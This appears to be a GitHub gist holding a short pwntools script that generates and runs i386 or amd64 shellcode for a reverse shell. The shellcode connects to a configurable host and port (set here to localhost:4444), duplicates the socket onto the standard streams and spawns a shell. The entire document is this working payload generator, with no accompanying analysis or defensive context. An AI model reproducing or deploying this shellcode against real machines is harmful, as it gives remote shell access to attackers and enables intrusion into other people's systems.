@FrankSpierings
Last active March 30, 2019 12:58
Reverse shell in pwntools
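from pwn import *

# Select the target architecture (uncomment the 64-bit line to switch).
# context(arch='x86_64')
context(arch='i386')

host = 'localhost'
port = 4444

# shellcraft.connect() leaves the connected socket in an architecture-specific register.
if context.arch == 'i386':
    sock = 'edx'
elif context.arch == 'amd64':
    sock = 'rbp'
else:
    raise NotImplementedError('Program the correct register for sock.')

# Connect to host:port, then duplicate the socket onto stdin/stdout/stderr and spawn a shell.
shellcode = pwnlib.shellcraft.connect(host, port)
shellcode += pwnlib.shellcraft.dupsh(sock)

log.info('Shellcode: \n{0}'.format(shellcode))
log.info('Length shellcode: {0} = 0x{0:x}'.format(len(asm(shellcode))))

# Assemble the shellcode and run it as a local test process.
p = run_assembly(shellcode)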